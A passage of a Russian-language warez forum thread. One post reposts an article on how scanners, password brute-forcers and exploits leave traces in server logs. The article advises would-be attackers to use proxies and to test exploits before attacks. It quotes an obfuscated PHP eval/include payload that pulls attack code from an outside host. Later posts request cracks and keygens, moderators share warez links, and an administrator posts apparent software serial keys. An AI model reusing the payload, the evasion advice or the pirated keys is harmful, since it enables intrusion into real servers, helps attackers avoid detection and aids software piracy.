Здравствуйте, гость ( Вход | Регистрация )



Гостевой доступ к форуму из Москвы: Телефоны: +7(495)7859696,7376201,7376233,7868796,7390241 Login: demo Password: demo
9 страниц V « < 7 8 9  
ОтветитьСоздать новую тему
> Дежурная Аптека
Б.Ззз
сообщение Apr 11 2007, 12:23
Сообщение #161


Шмель
Group Icon

Группа: Advanced
Сообщений: 3 008
Регистрация: 23-June 05
Из: Москва, СВАО
Пользователь №: 17
Настроение: )
Заходит на форум с полного инета.



В хакеров играешь? )

По-моему, ни кряков, ни патчей пока нет. Я не нашёл. Зато нашёл инфу к размышлению wink.gif

Как подставляют сканнеры и эксплойты
[ Безопасность в Интернете ]


Конечно же все мы когда либо пользовались сканнерами типа XSpider, LanSpy и т.д.. Так же большинство из нас пользуется эксплойтами которые пишут различные security-команды. При этом мы даже не задумываемся, или задумываемся совсем редко, о том, что сканнеры и эксплойты оставляют после себя огромную кучу следов, по которым Вас вычислить – дело часа, а то и минут 10. Сейчас я попытаюсь объяснить как именно Вас могут подставить эксплойты и сканнеры уязвимостей.

Для начала давайте рассмотрим сканнер безопасности XSpider. Безусловно, это лидер на рынке сканнеров безопасности. Но он создан именно для “открытого” сканирования. Самые первые следы могут быть найдены уже при начале сканирования – первым производится сканирование портов. Оно производится в большое количество потоков, поэтому легко обнаружается файрволом, соответственно администратор может с лёгкостью обнаружить в лог-файлах файрвола Ваш IP. Но это ещё пол беды. Максимум что Вам могут сделать за сканирование – предупредить, либо в будущем отфильтровывать все запросы с Вашего IP-адреса (бан по IP).

Идём дальше – XSpider, при обнаружения какой либо службы, в которой присутствует авторизация (Telnet, FTP, POP3 и т.д.), начинает подбирать к ней пароль, что тоже чревато последствиями. По большому счёту при подборе пароля есть 2 варианта развития событий:

1. Таймаут
2. Занесение попыток в логи

При первом варианте сервис обнаружает подбор пароля и на все, даже правильные, попытки авторизации начинает отказывать Вам в доступе. Соответственно администратору сообщается об этом.

При втором же варианте в логах появляется несколько сотен, а то и тысяч, строчек с попытками неверной авторизации, с промежутком в доли секунд, что явно указывает на подбор пароля. Это относится не только к XSpider, но и ко всем брутерам типа Brutus, Hydra и т.д..

Вот здесь есть лог ftp-сервера к которому я подбирал пароль с помощью Brutus-AET2. При подборе использовались словари которые идут в комплекте с Brutus-AET2. (users.txt,words.txt). Подбор только по этим словарям добавил в логи ровно 1000 строчек. Тот же XSpider имеет словари которые больше в тысячи раз.

Далее проходит анализ веб-контента и CGI-сканирование. Анализ веб-контента страшен тем, что сканнер начинает обнаружать уязвимостями самыми пресловутыми способами – подставляя в параметры кавычки, AND 1=1/*, всяческие теги в поля для ввода и т.д. Любая IDS сразу начнёт визжать и выдаст огромный список попыток атак. Конечно, Вы можете сказать – “там же есть галочка “Маскировать от IDS””. Хочу Вас огорчить – эта галочка практически ничего не значит, более-менее нормально настроенная IDS всё равно обнаружит попытки атак. К тому же, даже если IDS не имеется, Вы загадите логи так, что любой Вася из 9 класса, за шоколадку держащий сервер, обнаружит факт CGI-сканирования.

Для того, что бы больше Вас убедить я просканировал свой веб-сервер XSpider`ом используя профиль HTTPAll, предварительно вычистив у веб-сервера все логии полностью. После CGI-сканирования логи стали весить 642(!) кб. Лог заполненный результатами работы XSpider Вы так же можете посмотреть здесь.
Вот небольшой кусок из этого лога:

172.17.11.142 - - [21/Jan/2007:13:29:12 +0300] "GET /nkpyuetjqhiarwwk.htm HTTP/1.1" 400

172.17.11.142 - - [21/Jan/2007:13:29:12 +0300] "GET / HTTP/1.1" 302

172.17.11.142 - - [21/Jan/2007:13:29:12 +0300] "GET /https-admserv/bin/index HTTP/1.1" 404

172.17.11.142 - - [21/Jan/2007:13:29:12 +0300] "GET /Admin.po?proceed=yes HTTP/1.1" 404

172.17.11.142 - - [21/Jan/2007:13:29:13 +0300] "GET /Admin/index.jsp HTTP/1.1" 200

172.17.11.142 - - [21/Jan/2007:13:29:13 +0300] "GET /std.html HTTP/1.1" 404

172.17.11.142 - - [21/Jan/2007:13:29:13 +0300] "GET /servlet/ServletManager HTTP/1.1" 404

172.17.11.142 - - [21/Jan/2007:13:29:13 +0300] "GET /admin/contextAdmin/contextList.jsp HTTP/1.1" 200

172.17.11.142 - - [21/Jan/2007:13:29:14 +0300] "GET / HTTP/1.1" 302

172.17.11.142 - - [21/Jan/2007:13:29:14 +0300] "PUT /PTNSSnnxam.txt HTTP/1.1" 405


Как видите – первые 4 запроса сделаны в 13:29:12 – 100% cgi-сканирование.
Причём сканирование идёт со скоростью 4 запроса в секунду. На такую скорость сработает любая IDS. Ну и конечно же стоит упомянуть о том, что XSpider добавил своим сканированием 7068 строчек в лог-файл. Если Вы будете сканировать дохлый сайт какой ни будь компании, который посещают человека 2-3 в неделю (и то по ошибке), то Вы явно нарвётесь на неприятности. Самое лучшее, что можно сделать – сканировать/подбирать пароль через прокси. И то если Вы это сделаете, то будьте на 80% уверенны в том, что после Ваших действий Вас на той стороне уже будут ждать, а возможно и поменяют все пароли.

Далее по списку (если используется профиль Default) идёт поиск уязвимостей в остальных сервисах – удалённые переполнения буфера, DoS и т.д.. И мало кто из начинающих читает предупреждения или Help сканнера. Вот вырезка из справки XSpider – “Иногда, при плохом качестве связи с проверяемым хостом возможно ложное определение DoS-уязвимости (когда связь с хостом прервалась случайно, а XSpider сделал вывод, что прошла DoS-атака).” – отсюда делаем вывод - если DoS-атака пройдёт, то сервер реально может откинуться, но если верить той же справке, то такое происходит в 40% случаев. Обратите внимание ещё на то, что при настраивании профиля там ясно указывается - обнаружение некоторых уязвимостей может плохо кончится для сервера.

Ну, думаю что со сканнерами и с брутерами всё понятно. Давайте теперь перейдём к эксплойтам. Вы наверное ни раз уже пользовались ими. Но хоть один из Вас задумывался как они работают? Что они делают? Какие следы могут оставить? Я думаю что 70% читателей скажут “Нет”.

Большой популярностью (по мнению автора) пользуются эксплойты к форумам. Как Вы наверное уже знаете – на большинстве форумов распознавание пользователей происходит с помощью сессий. Имена сессий представляют из себя обычный набор букв и цифр – никаких посторонних или опасных знаков. Каждый кто заходит на форум получает сессию даже если он не авторизирован. Вот пример обычного имени сессии:
ab7bfc3f886270fd339dcce652fed1eb

А в эксплойте для ipb2.1.6 от RST как имя сессии передаётся строка ipb216_for_IDS. Так же, в каком-то эксплойте, (точно уже не помню) имя сессии было IDS_i_am_exploit. И таких примеров множество. Если Вы хотя бы немного знаете об IDS, то Вы наверное в курсе того что базы IDS часто обновляются, соответственно в них есть записи о том как распознать эксплоит.

Конечно же, IDS стоят не на всех веб-серверах, но это не спасёт Вас от вычисления в ~60% случаях использования эксплойтов. Возьмём, к примеру, эксплоит для IPB 2.1.5 от RST, который выполнял произвольные команды. Он создаёт топик называющийся justxpl, с примечанием justxpl justxpl. Топик содержит следующий текст:

r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53) .chr(55).chr(105).chr(112).chr(98). chr(105).chr(110).chr(99). chr(46). chr(116).chr(120).chr(116)))


Грамотный администратор сразу же поймёт в чём дело, а Вы лишний раз засветитесь.
Вот вырезка из жалобы одного администратора провайдеру:
“попытки взлома форума продолжаются – на этой неделе опять были созданы темы «justxpl». Автор лазит через прокси.”


А эксплойты для удалённого переполнения буфера или повышения привилегий вообще не стоит использовать предварительно не проверив их работу хотя бы на виртуальной машине. Данные типы эксплойтов опасны тем, что могут делать далеко не то что обещают. В эксплойте может существовать и защита от дурака. Я слышал о множестве случаев когда запускали эксплоит, который (как в комментариях писалось) через уязвимость в определённом сервисе давал атакующему командную строку с привилегиями администратора, а получали полное вырубание сервиса или DoS всей машины.
Эксплойты для поднятия привилегий через уязвимость в ядре вообще могут грохнуть ОС так, что придётся переустанавливать. А подумайте сами – за что дадут больше сроку: за то что Вы просто получили командную строку или за то что Вы убили ядро ОС и вывели сервер из рабочего состояния?
Надеюсь после прочтения данной статьи многие задумаются и начнут перед атаками тестировать эксплойты на виртуальных машинах или локальном веб-сервере.

Автор: Kuzya



--------------------
Знаете зачем в метро внизу сидит бабулька? Она там педальки крутит
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
PinkY
сообщение Apr 12 2007, 16:02
Сообщение #162


Пользователь
**

Группа: Новички
Сообщений: 90
Регистрация: 7-April 07
Пользователь №: 780
Заходит на форум с полного инета.



Цитата
В хакеров играешь? )

Кто нерезкует тот не пьет
пишет какойто кузя ., а если повезет то логи почистиш и Ip нереальный


Сообщение отредактировал PinkY - Apr 12 2007, 16:05


--------------------
Бряк Поинт Изображение

Эй, Брейн, чем мы будем заниматься сегодня вечером?
- Тем же, чем и всегда, Пинки. Попробуем завоевать мир!

Вот Пинки, вот и Брейн,
Вот Пинки, вот и Брейн,
И если Брейн не гений,
То Пинки туп, как пень.
Хоть смейся ты, хоть плачь,
В мозги залез им врач,
И мыши обозлились на людей-ей-ей-ей
Брейн-Брейн-Брейн-Брейн-Брейн.
PINKY AND
THE BRAIN
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Б.Ззз
сообщение Apr 13 2007, 01:20
Сообщение #163


Шмель
Group Icon

Группа: Advanced
Сообщений: 3 008
Регистрация: 23-June 05
Из: Москва, СВАО
Пользователь №: 17
Настроение: )
Заходит на форум с полного инета.



biggrin.gif


--------------------
Знаете зачем в метро внизу сидит бабулька? Она там педальки крутит
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
mars
сообщение Dec 1 2007, 01:30
Сообщение #164


Пользователь
**

Группа: Пользователи
Сообщений: 86
Регистрация: 18-August 06
Из: Москва, район Аэропорт
Пользователь №: 539
Имя: Mar'asin Semen
Настроение: by default
Заходит на форум с гостевика.



Люди добрые! Подскажите плиз...
Вот есть у меня Microsoft Office 2007 Professional русская версия, триал 60 дней. На халяву диск достался smile.gif
Так вот. Стал я искать к нему ключик (25значный). Нашёл, этих ключей по всему инету немеряно накидано.
После этого он мне дал код установки (9 групп по 6 цифр), спрашивает код подтверждения (7 групп по 6 цифр).
Я искал кейген, не нашёл.
Есть только Microsoft.Office.2007.Enterprise.Keygen, но он генерирует только 25значный ключ, который не подходит sad.gif
Насколько я понял, этот кейген делает ключ для предприятий, на который офис не просит активации, но к Professional версии они не подходят! sad.gif А enterprist качать влом... sad.gif
Не посоветуете, есть ли кейген для активации Professional?


--------------------
Сяпала калуша по напушке
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
El_Barto
сообщение Jan 23 2008, 19:42
Сообщение #165


Гость


Группа: Новички
Сообщений: 1
Регистрация: 23-January 08
Пользователь №: 1 004
Заходит на форум с полного инета.



кто может подскажите
где найти кряк или регистрацию для
The Bat! Password Recovery 1.4 ???
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
*encore*
сообщение Jan 24 2008, 15:35
Сообщение #166


xXx
Group Icon

Группа: Moderators
Сообщений: 202
Регистрация: 23-June 05
Из: Moscow
Пользователь №: 18
Заходит на форум с полного инета.



Есть версия 1.0 с таблеткой. Думаю не сильно отличается.
http://mywarez.ifolder.ru/176863
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
*encore*
сообщение Jan 24 2008, 16:02
Сообщение #167


xXx
Group Icon

Группа: Moderators
Сообщений: 202
Регистрация: 23-June 05
Из: Moscow
Пользователь №: 18
Заходит на форум с полного инета.



Вот еще версия 1.2 с лекарством.
http://rapidshare.com/files/86232571/TheBa...covery.zip.html
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Дмитрий
сообщение Mar 5 2008, 23:22
Сообщение #168


Гость


Группа: Новички
Сообщений: 2
Регистрация: 5-March 08
Пользователь №: 1 171
Заходит на форум с гостевика.



Где взять ключ к Macromedia Flash MX 2004 7.0.1
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Siras
сообщение Mar 6 2008, 02:01
Сообщение #169


Server Admin
Group Icon

Группа: Administrators
Сообщений: 1 801
Регистрация: 22-November 04
Из: Москва, Перово
Пользователь №: 11
Заходит на форум с полного инета.



Попробуйте эти:
WPD700-58202-88194-29915
WPD700-57105-56494-25874
WPD700-57309-37594-46497
WPD700-57107-73894-53465
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
ismolnik
сообщение Mar 7 2008, 21:15
Сообщение #170


Суперадмин =)
Group Icon

Группа: Advanced
Сообщений: 2 107
Регистрация: 29-August 05
Из: ЗАО
Пользователь №: 107
Заходит на форум с полного инета.



Дайте ключ Dr.Web 4.44


--------------------
This message written with recycled electrons. MSU
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
ismolnik
сообщение Mar 8 2008, 08:43
Сообщение #171


Суперадмин =)
Group Icon

Группа: Advanced
Сообщений: 2 107
Регистрация: 29-August 05
Из: ЗАО
Пользователь №: 107
Заходит на форум с полного инета.



Up


--------------------
This message written with recycled electrons. MSU
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
*encore*
сообщение Mar 8 2008, 11:45
Сообщение #172


xXx
Group Icon

Группа: Moderators
Сообщений: 202
Регистрация: 23-June 05
Из: Moscow
Пользователь №: 18
Заходит на форум с полного инета.



Попробуй вот эти:
http://depositfiles.com/files/3997655
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
русик
сообщение May 22 2009, 19:45
Сообщение #173


Гость


Группа: Пользователи
Сообщений: 1
Регистрация: 22-May 09
Пользователь №: 3 335



Encore 6.4 нужен кряк- это караоке плеер, но читает защищенные LG караоке диски, и качество звука в этой версии отличное. Все ссылки которые находил- удаленные. Да и одноименные программы затрудняют поиск.

Encore 6.4 нужен кряк- это караоке плеер, но читает защищенные LG караоке диски, и качество звука в этой версии отличное. Все ссылки которые находил- удаленные. Да и одноименные программы затрудняют поиск.
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
*encore*
сообщение May 22 2009, 22:15
Сообщение #174


xXx
Group Icon

Группа: Moderators
Сообщений: 202
Регистрация: 23-June 05
Из: Moscow
Пользователь №: 18
Заходит на форум с полного инета.



На 6ку лекарства нет, точно.
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение

9 страниц V « < 7 8 9
ОтветитьСоздать новую тему
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0

 

- Текстовая версия Сейчас: 23rd January 2021 - 16:49
 
     
Rambler's Top100 службы мониторинга серверов
Gentoo Powered Lighttpd Powered